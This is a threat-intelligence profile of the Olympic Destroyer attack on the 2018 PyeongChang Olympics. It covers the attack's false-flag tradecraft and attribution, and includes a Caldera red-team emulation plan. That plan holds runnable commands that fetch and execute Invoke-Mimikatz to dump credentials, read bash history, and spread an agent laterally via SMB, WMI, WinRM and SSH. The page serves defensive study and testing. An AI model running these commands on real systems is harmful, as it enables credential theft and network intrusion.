Home/Threat Actor/Olympic Destroyer
Threat Actor

Olympic Destroyer

olympic_destroyer · russia_apt_sandworm · active since 2017-11

Olympic Destroyer (canonical Kaspersky-Talos malware naming for the destructive self-propagating worm deployed against the February 9, 2018 PyeongChang Winter Olympics opening ceremony per Cisco Talos Warren Mercer + Paul Rascagneres canonical February 12, 2018 disclosure "Olympic Destroyer Takes Aim At Winter Olympics" + Kaspersky GReAT canonical March 2018 false-flag unmasking analysis.

Kaspersky "Hades" actor naming for operators per Securelist December 2018 "Hades, the actor behind Olympic Destroyer is still alive" follow-up) is Sandworm Team's (Russian GRU Unit 74455, also Mandiant APT44 / Microsoft Seashell Blizzard, curated separately as sandworm_team parent operator) signature false-flag destructive cyberweapon, operationally the most sophisticated publicly-documented false-flag operation in industry- tracked cyber-operation history.

cluster-defining multi-attribution-target false-flag tradecraft included forged Rich Header automatically-generated signature designed to match DPRK Lazarus Group fingerprint (Kaspersky Igor Soumenkov canonical Rich Header verification mismatch unmasking: "100% confidence this is not Lazarus Group", "Looking more closely at the malware wiper file headers, he discovered one of the headers had been forged: it didn't belong to Lazarus") + additional false-flag attribution targets including Chinese APT3 + APT10 via code reuse similarity + Russian Sofacy/APT28 via TTP similarity, per Kaspersky Vitaly Kamluk: "They fooled a lot of smart people. They wanted to be discovered. They wanted it to be discovered as Lazarus Group... This was a game- changer".

standalone malware platform cluster paralleling blackenergy + industroyer + notpetya in Sandworm-platform-family cell.

operational attack architecture: pre-positioning November 2017 - February 2018 included IT provider compromise + Atos IT service provider France compromise + ~5 Sandworm operators spear-phishing campaign impersonating International Olympic Committee (IOC) + Korean National Counter- Terrorism Centre + CEO of timekeeping provider per Citalid.

attack execution February 9, 2018 used 3+ initial infection launchpads (pyeongchang2018.com + ski resort network servers + Atos IT service provider servers per Kaspersky) with self-propagating worm spreading through Windows network shares via stolen credentials (Mimikatz-like in-memory credential exfiltration + replication tradecraft)

PowerShell Empire agent final payload + Microsoft OneDrive C2 + hardcoded 32-byte ASCII hex alphabet RC4 key payload decryption per Securelist.

"light destruction" capability restraint signature per Kaspersky: "By deleting and destroying all local data, they could have easily devastated the Olympic infrastructure. Instead, they decided to do some 'light' destruction" , opening ceremony impact limited to Olympics website (ticketholders unable to print tickets) + stadium WiFi + display monitors + broadcast systems + ski resort gates/lifts disabled at 2 ski resort hotels + Windows file share wipes + service disables + some systems unbootable + event log resets + backup deletes.

code links to NotPetya + BadRabbit + EternalRomance exploit per Cisco Talos Craig Williams analysis + Kaspersky additional verification; attribution unraveling chain: initial multi-attribution confusion February 2018 - Cisco Talos early false- flag skepticism February 12, 2018 - Kaspersky Igor Soumenkov + Vitaly Kamluk canonical Rich Header verification mismatch unmasking March 2018 - WIRED Andy Greenberg + researcher Matonis Sandworm attribution via Ukrainian LGBT group + US state board of election voter roll targeting code clue convergence - July 2018 US DOJ indictment of 12 GRU hackers for 2016 US election interference identifying GRU Units 26165 + 74455 - Kaspersky December 2018 Hades follow- up - US DOJ October 15, 2020 Scott W. Brady indictment of GRU Unit 74455 officers.

per Andy Greenberg via Darknet Diaries Episode 77: "It's quite ironic but in this most-deceptive-ever piece of malware ultimately were the clues that not only identified the perpetrators of this attack as Russian, but also contained in them the identity that would allow the cyber-security community to tie everything from NotPetya to the 2015 and 2016 blackouts in Ukraine to this one group, Sandworm", Olympic Destroyer attribution work operationally tied the entire Sandworm-platform-family cell together.

"changed the attribution game forever" per Dark Reading + IT Security Guru + Cisco Talos Craig Williams + Andy Greenberg consensus assessment.

cluster fills the false-flag-operational-tradecraft slot in Sandworm- platform-family chronology: BlackEnergy 2015 - Industroyer 2016 - NotPetya 2017 - Olympic Destroyer 2018 - Industroyer2 2022.

continued industry reference status as canonical illustration of Rich Header forgery vulnerability + most sophisticated publicly-documented false-flag operation in cyber-operation history through 2018-2026 period.

russia_apt_sandworm confidence: high 12 aliases
Sigma rules200 YARA rules2 Live IOCs0 CVEs exploited1

Profile

Olympic Destroyer (canonical Kaspersky-Talos malware naming for the destructive self-propagating worm deployed against the February 9, 2018 PyeongChang Winter Olympics opening ceremony.

Kaspersky "Hades" actor naming for the operators) is Sandworm Team's signature false-flag destructive cyberweapon, operationally the most sophisticated publicly- documented false-flag operation in industry-tracked cyber-operation history per Kaspersky + Cisco Talos + WIRED Andy Greenberg + Dark Reading analysis. Russian state-sponsored APT attribution via Kaspersky Igor Soumenkov + Vitaly Kamluk canonical March 2018 false-flag unmasking (Rich Header verification mismatch, "100% confidence this is not Lazarus Group") + WIRED Andy Greenberg + Matonis Sandworm attribution via Ukrainian LGBT group + US state board of election voter roll targeting code clue convergence + US DOJ October 15, 2020 indictment of GRU Unit 74455 officers. Standalone malware platform cluster paralleling blackenergy + industroyer + notpetya in the Sandworm- platform-family cell distinct from sandworm_team parent operator cluster. Cluster-defining multi-attribution-target false-flag tradecraft: The attackers operationally forged the Rich Header automatically-generated signature in the executable file to perfectly match Lazarus Group fingerprint, designed to be discovered as Lazarus per Kaspersky analysis. Additional false-flag attribution targets included Chinese APT3 + APT10 (via code reuse similarity) + Russian Sofacy/APT28 (via TTP similarity). Per Vitaly Kamluk: "They wanted to be discovered. They wanted it to be discovered as Lazarus Group... This was a game-changer." Per Cisco Talos Craig Williams: "There were several false flags that appear to have been intentionally implanted in Olympic destroyer. It's likely these were planted by our adversary to confuse and mislead the security community.

" Operational attack architecture: Pre-positioning (November 2017
February 2018)
  • IT provider compromise + Atos IT service provider France compromise as early as November 2017.
  • ~5 Sandworm operators spear-phishing impersonating IOC + Korean National Counter-Terrorism Centre + CEO of timekeeping provider Attack execution February 9, 2018:.
  • 3+ initial infection launchpads (pyeongchang2018.com + ski resort network servers + Atos IT service provider servers)
  • Self-propagating worm via Windows network shares + stolen credentials (Mimikatz-like in-memory credential exfiltration + replication)
  • PowerShell Empire agent final payload + Microsoft OneDrive C2 + RC4-encrypted multi-stage payloads.
  • "Light destruction" payload: Olympics website + stadium WiFi + display monitors + broadcasts + ski resort gates/lifts disabled + Windows file share wipes + service disables + some systems unbootable + event log resets + backup deletes Capability restraint signature: per Kaspersky, "By deleting and destroying all local data, they could have easily devastated the Olympic infrastructure. Instead, they decided to do some 'light' destruction." Cluster- defining "light destruction" tradecraft demonstrating capability restraint pattern.
Signature operational tradecraft
  • Multi-attribution-target false-flag (cluster- defining): forged Rich Header Lazarus fingerprint + APT3/APT10 Chinese code reuse + Sofacy TTP similarities.
  • "Light destruction" capability restraint (cluster- defining): chose limited disruption despite administrative access.
  • Self-propagating worm + credential-driven lateral movement: in-memory credential storage + replication.
  • PowerShell Empire post-exploitation framework: signature post-exploitation tooling.
  • Microsoft OneDrive C2 + RC4 hardcoded key payload decryption: signature multi-stage C2 + payload mechanism.
  • TeleBots backdoor framework adjacent: Sandworm- platform-family codebase coherence.
  • Code links to NotPetya + BadRabbit + EternalRomance: per Talos + Kaspersky.
  • "Changed the attribution game forever": per Dark Reading + IT Security Guru + Cisco Talos analysis The cluster fills the false-flag-operational-tradecraft slot in Sandworm-platform-family chronology: BlackEnergy 2015.
  • Industroyer 2016.
  • NotPetya 2017.
  • Olympic Destroyer 2018.
  • Industroyer2 2022. Operationally significant as the canonical illustration of Rich Header forgery vulnerability + most sophisticated publicly-documented false-flag operation in cyber-operation history.

Aliases

12
olympic_destroyerolympic destroyerolympicdestroyerolympic_destroyer_wormhadeshades threat actorpyeongchang 2018 olympics cyberattackwinter olympics 2018 malwareolympic destroyer false flagolympic destroyer lazarus forgeryolympic destroyer sandwormolympic destroyer hades

Adversary Emulation Plan

13 steps
Runnable Caldera emulation profile Worm - Move laterally any way possible. Ordered along the attack lifecycle; each step maps to an ATT&CK technique with a concrete executor command. For authorized red-team / purple-team exercises only.
0 collection T1005 · Data from Local System darwin, linux
Parse SSH config
pip install stormssh && storm list
1 credential-access T1552.003 · Unsecured Credentials: Bash History darwin, linux
Dump history
find ~/.bash_sessions -name '*' -exec cat {} \; 2>/dev/null
2 discovery T1135 · Network Share Discovery windows
View admin shares
Get-SmbShare | ConvertTo-Json
3 discovery T1018 · Remote System Discovery darwin, linux, windows
Collect ARP details
arp -a
4 credential-access T1003.001 · OS Credential Dumping: LSASS Memory windows
Run PowerKatz
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $True };
$web = (New-Object System.Net.WebClient);
$result = $web.DownloadString("https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/4c7a2016fc7931cd37273c5d8e17b16d959867b3/Exfiltration/Invoke-Mimikatz.ps1");
iex $result; Invoke-Mimikatz -DumpCreds
5 discovery T1018 · Remote System Discovery windows
Find Hostname
nbtstat -A #{remote.host.ip}
6 discovery T1018 · Remote System Discovery windows
Reverse nslookup IP
nslookup #{remote.host.ip}
7 lateral-movement T1021.002 · Remote Services: SMB/Windows Admin Shares windows
Mount Share
net use \\#{remote.host.fqdn}\C$ /user:#{domain.user.name} #{domain.user.password}
8 lateral-movement T1021.002 · Remote Services: SMB/Windows Admin Shares windows
Copy 54ndc47 (SMB)
$path = "sandcat.go-windows";
$drive = "\\#{remote.host.fqdn}\C$";
Copy-Item -v -Path $path -Destination $drive"\Users\Public\s4ndc4t.exe";
9 lateral-movement T1570 · Lateral Tool Transfer windows, darwin, linux
Copy 54ndc47 (WinRM and SCP)
$job = Start-Job -ScriptBlock {
  $username = "#{domain.user.name}";
  $password = "#{domain.user.password}";
  $secstr = New-Object -TypeName System.Security.SecureString;
  $password.ToCharArray() | ForEach-Object {$secstr.AppendChar($_)};
  $cred = New-Object -Typename System.Management.Automation.PSCredential -Argumentlist $username, $secstr;
  $session = New-PSSession -ComputerName "#{remote.host.name}" -Credential $cred;
  $location = "#{location}";
  $exe = "#{exe_name}";
  Copy-Item $location -Destination "C:\Users\Public\svchost.exe" -ToSession $session;
  Start-Sleep -s 5;
  Remove-PSSession -Session $session;
};
Receive-Job -Job $job -Wait;
10 execution T1047 · Windows Management Instrumentation windows
Start 54ndc47 (WMI)
$node = '''#{remote.host.fqdn}''';
$user = '''#{domain.user.name}''';
$password = '''#{domain.user.password}''';
wmic /node:$node /user:$user /password:$password process call create "powershell.exe C:\Users\Public\s4ndc4t.exe -server #{server} -group #{group}";
11 lateral-movement T1021.006 · Remote Services: Windows Remote Management windows
Start Agent (WinRM)
$username = "#{domain.user.name}";
$password = "#{domain.user.password}";
$secstr = New-Object -TypeName System.Security.SecureString;
$password.ToCharArray() | ForEach-Object {$secstr.AppendChar($_)};
$cred = New-Object -Typename System.Management.Automation.PSCredential -Argumentlist $username, $secstr;
$session = New-PSSession -ComputerName #{remote.host.name} -Credential $cred;
Invoke-Command -Session $session -ScriptBlock{start-job -scriptblock{cmd.exe /c start C:\Users\Public\svchost.exe -server #{server} }};
Start-Sleep -s 5;
Remove-PSSession -Session $session;
12 lateral-movement T1021.004 · Remote Services: SSH darwin, linux
Start 54ndc47
scp -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -o ConnectTimeout=3 sandcat.go-darwin #{remote.ssh.cmd}:~/sandcat.go &&
ssh -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -o ConnectTimeout=3 #{remote.ssh.cmd} 'nohup ./sandcat.go -server #{server} -group red 1>/dev/null 2>/dev/null &'

Notable Campaigns

10
2020US DOJ Indictment of GRU Officers (October 15, 2020)
2018-2026Continued Industry Reference Status (2018-2026)
2018-2019WIRED Andy Greenberg + Matonis Sandworm Attribution (2018+)
2018Olympic Destroyer Opening Ceremony Attack (February 9, 2018)
2018Cisco Talos Canonical Disclosure (February 12, 2018)
2018Kaspersky Canonical False-Flag Unmasking (March 2018)
2018Kaspersky Hades Still Alive Follow-Up (December 2018)
2017-20185-Operator Sandworm Spear-Phishing Campaign (Pre-Olympics)
2017Russia Banned from PyeongChang Olympics (December 5, 2017)
2017IT Provider Compromise (November 2017)

Attribution & Reporting

Attributed by
Kaspersky GReAT (Igor Soumenkov + Vitaly Kamluk, canonical Rich Header verification mismatch + false-flag unmasking March 2018)Cisco Talos (Warren Mercer + Paul Rascagneres + Craig Williams, canonical February 12 2018 disclosure + false-flag skepticism)WIRED Andy Greenberg (canonical Sandworm attribution journalism + Sandworm book 2019)Darknet Diaries (Jack Rhysider + Matonis-narrated Sandworm attribution episode)Kaspersky Securelist (canonical "Hades, the actor behind Olympic Destroyer is still alive" December 2018 follow-up)Symantec Security ResponseESET WeLiveSecurity (canonical TeleBots - Olympic Destroyer codebase analysis)Mandiant / Google Cloud Threat Intelligence Group (APT44 Sandworm canonical tracking)Microsoft Threat Intelligence Center (Seashell Blizzard canonical tracking)CrowdStrike (Voodoo Bear canonical tracking)US Department of Justice (October 15 2020 indictment of GRU officers per Scott W. Brady)Reuters (Jim Finkle, initial Olympic Destroyer malware reporting February 12 2018)threatpost (Christopher Kanaracus, early industry reporting)Cyberlaw CCDCOE Interactive Toolkit (canonical international cyber law case documentation)Citalid (canonical Sandworm operational analysis)Huntress (canonical false flag operational case study)Dark Reading (canonical false-flag industry analysis)TechTarget (canonical false-flag cyberattack research compilation)IT Security Guru (canonical Kaspersky disclosure compilation)
Key reporting
reportKaspersky GReAT (Igor Soumenkov + Vitaly Kamluk): Olympic Destroyer false-flag canonical unmasking (March 2018), canonical Rich Header forgery analysis
reportCisco Talos (Warren Mercer + Paul Rascagneres + Craig Williams): Olympic Destroyer Takes Aim At Winter Olympics (February 12, 2018), canonical first technical disclosure with early false-flag skepticism
reportAndy Greenberg (WIRED + Sandworm book 2019): canonical Sandworm attribution chronicle including Olympic Destroyer Matonis attribution work
reportDarknet Diaries Episode 77, Olympic Destroyer: canonical podcast narrative chronicle with Andy Greenberg + Jack Rhysider
reportKaspersky Securelist: Hades, the actor behind Olympic Destroyer is still alive (December 2018), canonical Hades naming + post-Olympics tracking
reportReuters (Jim Finkle): Olympic Destroyer malware targeted PyeongChang Games, firms (February 12, 2018), canonical initial industry reporting
reportthreatpost (Christopher Kanaracus): Olympic Destroyer Malware Behind Winter Olympics Cyberattack (February 12, 2018)
reportMandiant / Google Cloud Threat Intelligence Group: APT44 Sandworm canonical tracking including Olympic Destroyer
reportMicrosoft Threat Intelligence Center: Seashell Blizzard canonical Sandworm tracking
reportCrowdStrike: Voodoo Bear canonical tracking
reportESET WeLiveSecurity: TeleBots backdoor framework codebase analysis including Olympic Destroyer code links
reportSymantec Security Response: Olympic Destroyer technical analysis
reportHuntress: What Is a False Flag?, Olympic Destroyer canonical case study
reportDark Reading: Olympic Destroyer's 'False Flag' Changes the Game
reportTechTarget SearchSecurity: Olympic Destroyer was a false flag cyberattack, research claims
reportIT Security Guru: The Olympic False Flag, canonical Kaspersky disclosure compilation
reportCyberlaw CCDCOE Interactive Toolkit: Olympic Destroyer (2018) canonical international cyber law case documentation
reportCitalid: Computer Sabotage Of The Olympic Games, canonical Sandworm operational analysis
reportUS Department of Justice (Scott W. Brady): October 15, 2020 indictment including Olympic Destroyer
reportMITRE ATT&CK Software S0365: Olympic Destroyer
reportMalpedia Software Profile: Olympic Destroyer

Operational

State sponsor

Russian state-sponsored APT, specifically Sandworm Team (GRU Unit 74455, also Mandiant APT44 / Microsoft Seashell Blizzard / Kaspersky "Hades" actor naming, curated separately as sandworm_team parent operator cluster). Attribution chain (canonical false-flag unraveling): (1) Initial multi-attribution confusion (February 2018): per Kaspersky + Dark Reading + TechTarget: "no other sophisticated malware has had so many attribution hypotheses put forward as the Olympic Destroyer." Researchers initially attributed Olympic Destroyer to various candidates including DPRK Lazarus Group (most prominent, based on Rich Header fingerprint), Chinese APT3 + APT10 (based on malware similarity), Iranian actors, and Russian Sofacy/APT28. (2) Kaspersky Igor Soumenkov canonical Rich Header verification mismatch (March 2018): per IT Security Guru + Securelist + Dark Reading: Igor Soumenkov (Kaspersky GReAT principal security researcher) noticed Rich Header fingerprint forgery.

Per Soumenkov: "We have 100% confidence this is not Lazarus Group." Per analysis: "Looking more closely at the malware wiper file headers, he discovered one of the headers had been forged: it didn't belong to Lazarus. That header was proof that the attackers had tried to hide behind the Lazarus malware as a false flag operation." Per Vitaly Kamluk (Kaspersky Asia Pacific Research Team head): "They fooled a lot of smart people. They wanted to be discovered.

They didn't clean up after themselves and made the malware easily discoverable. They wanted it to be discovered as Lazarus Group... They were not just relying on simulation of Lazarus Group.

This was a game-changer." Per Kaspersky researcher conclusion: "To our knowledge, the evidence we were able to find was not previously used for attribution. Yet the attackers decided to use it, predicting that someone would find it." The Rich Header is an automatically-generated signature stored in executable files, combination of features can identify malware authors and projects. Attackers forged automatically generated signatures to perfectly match Lazarus Group fingerprint.

(3) Cisco Talos February 12, 2018 false-flag skepticism (early indication): per TechTarget: Talos researchers noted "actual culprits could have added the file name check, and mimicked the wiper function simply in order to implicate the Lazarus group and potentially distract from their true identity." Per Craig Williams (Cisco Talos Outreach director): "There were several false flags that appear to have been intentionally implanted in Olympic destroyer. It's likely these were planted by our adversary to confuse and mislead the security community." Talos additionally described code similarities to NotPetya + BadRabbit + EternalRomance exploit per Talos + Kaspersky.

(4) WIRED Andy Greenberg + Darknet Diaries canonical Matonis Sandworm attribution: per Darknet Diaries: WIRED's Andy Greenberg + researcher (Matonis) tracked Olympic Destroyer attribution clues that connected to Ukrainian LGBT group targeting + US state board of election voter roll targeting
  • all pointing to Sandworm. Per Greenberg: "It's quite ironic but in this most-deceptive-ever piece of malware ultimately were the clues that not only identified the perpetrators of this attack as Russian, but also contained in them the identity that would allow the cyber-security community to tie everything from NotPetya to the 2015 and 2016 blackouts in Ukraine to this one group, Sandworm." Olympic Destroyer attribution work operationally tied the entire Sandworm-platform-family cell together, BlackEnergy 2015 + Industroyer 2016 + NotPetya 2017 + Olympic Destroyer 2018. (5) Kaspersky December 2018 "Hades is still alive" follow-up: per Securelist: Kaspersky tracked continued Hades activity post-2018 Olympics with financial + non-financial targeting + similar false- flag deception tradecraft. (6) US DOJ October 15, 2020 indictment: per Citalid + Wikipedia: US DOJ indictment of 5 GRU officers October 2020 included role in Olympic Destroyer (note: Olympic Destroyer indictment is smaller subset of 6 total GRU officers indicted for NotPetya + BlackEnergy + Olympic Destroyer Sandworm- platform-family operations). (7) "Changed the attribution game forever": per Dark Reading + IT Security Guru + Cisco Talos analysis: Olympic Destroyer's sophisticated false-flag operation "changed the attribution game forever" by demonstrating that automatically-generated signatures (Rich Headers) previously assumed to be reliable attribution evidence could be forged. Operational mission objective: Per Citalid: "the attackers' aim was to disrupt the Olympic Games by targeting the most high-profile event of the Games: the opening ceremony." Operationally coordinated with prior Russia banning from PyeongChang Winter Olympics December 2017 (international Olympic Committee sanction). Operational attack architecture: Pre-positioning phase (November 2017.
  • February 2018): (1) 5 Sandworm operators spear-phishing campaign: per Citalid: ~5 Sandworm operators sent booby-trapped links impersonating International Olympic Committee (IOC) + Korean National Counter-Terrorism Centre + CEO of timekeeping provider company. Targeted Olympic Games stakeholders + providers. (2) IT provider compromise November 2017: company providing Olympic Games IT network compromised as early as November 2017. Atos IT service provider in France also affected per Kaspersky. Attack execution February 9, 2018: (3) 3+ initial infection launchpads: per Kaspersky: pyeongchang2018.com + ski resort network servers + Atos IT service provider servers. From these launchpads, worm self-propagated through Windows network shares. (4) Self-propagating worm + credential theft: per Kaspersky + Citalid: malware exfiltrates authenticators, stores in memory, replicates via stolen credentials/passwords. Operationally similar to Mimikatz-like credential-driven lateral movement. (5) "Light destruction" payload execution: per Dark Reading + Kaspersky: opening ceremony attack took down WiFi at stadium + Olympics website (ticketholders couldn't print tickets) + display monitors + broadcast systems. Ski resort gates and lifts disabled at two ski resort hotels. Kaspersky noted: "the attackers didn't wreak the amount of destruction they could have with the systems they infected and the administrative accounts that had obtained. They wiped files in Windows shares, disabled Windows services, rendered some systems unbootable, reset event logs, and deleted some backups. By deleting and destroying all local data, they could have easily devastated the Olympic infrastructure. Instead, they decided to do some 'light' destruction." The cluster represents Sandworm's signature false-flag destructive cyberweapon, generational successor in Sandworm-platform-family chronology: BlackEnergy 2015.
  • Industroyer 2016.
  • NotPetya 2017.
  • Olympic Destroyer 2018.
  • Industroyer2 2022.
Motivations
winter_olympics_pyeongchang_2018_opening_ceremony_disruption, russia_banned_from_pyeongchang_2017_retaliation_speculation, most_sophisticated_publicly_documented_false_flag_operational_tradecraft_demonstration, sandworm_signature_destructive_worm_capability, multi_attribution_target_misdirection_lazarus_apt3_apt10_sofacy, light_destruction_demonstrating_capability_restraint_pattern, operational_security_test_of_attribution_misdirection_via_signature_forgery, changing_attribution_game_via_rich_header_forgery_demonstration
Sectors
olympic_games_organizing_committeepyeongchang_2018_organizing_committeeolympic_event_it_infrastructureatos_it_service_providerolympic_timekeeping_providersinternational_olympic_committee_iocolympic_broadcastersski_resorts_south_koreaski_resort_hotelskorean_national_counter_terrorism_centre
Regions
south_koreafranceeurope

Techniques Used

60
T1003T1003.001T1003.002T1005T1010T1014T1016T1018T1021T1021.001T1021.002T1021.003T1021.006T1027T1027.002T1027.005T1033T1036T1036.001T1036.004T1036.005T1037T1039T1047T1053T1053.005T1056T1056.001T1057T1059T1059.001T1059.003T1059.005T1059.007T1068T1069T1070T1070.001T1070.004T1070.006T1071T1071.001T1074T1078T1080T1082T1083T1087T1090T1090.001T1090.002T1095T1102T1106T1110T1119T1129T1133T1134T1140

Detection Blind Spots

60 techniques
Across this actor’s 60 mapped techniques, the share covered by each detection layer. Low bars are where you’d be blind if this actor targeted you.
Behavioral / log (Sigma)56/60 · 93%
Analytics (MITRE CAR)32/60 · 53%
Runtime / container (Falco)4/60 · 6%
File / malware (YARA)0/60 · 0%
Network (Suricata/Snort)14/60 · 23%
Vuln scan (Nuclei)0/60 · 0%

Atomic Test Plan

30 techniques
Runnable Atomic Red Team tests covering this actor’s mapped techniques - validate your detections against this specific adversary. Cross-reference the blind spots above. For authorized lab / purple-team use. Open the full builder

Tools Used

0 mapped
Other tooling / TTPs (curation, not ATT&CK-mapped):
MICROSOFT ONEDRIVE PAYLOAD DOWNLOADSKI RESORT NETWORK SERVERS INFECTED LAUNCHPADSSOFACY APT28 TTP SIMILARITIES FALSE FLAGSPEAR PHISHING IMPERSONATING IOC KOREAN CTC TIMEKEEPING CEO

CVEs Exploited

1
CVECVE-2017-0145
Intelligence Graph · click any node to traverse
CVETechnique ActorTool Family
drag to reposition · click any node to traverse · button top-right enlarges
External lookups - second-class, for what we don’t hold ourselves
MITRE searchMalpediaGoogle
Vulnerabilities
CISA KEV catalog
CWE weaknesses
CAPEC attack patterns
Package vulnerabilities
Threat intelligence
Threat actors
Tools & malware
ATT&CK techniques
IOCs
Detection & defense
Sigma rules
YARA rules
Atomic Red Team tests
D3FEND countermeasures
Compliance
NIST 800-53
ISO 27001:2022
SOC 2 TSC
PCI-DSS v4.0
CIS Controls v8.1
About
All capabilities
Live statistics
Data sources
Privacy policy
Terms of service
threatengine.sh  ·  Open-source threat intelligence platform  ·  100+ authoritative sources  ·  Every fact traces to its origin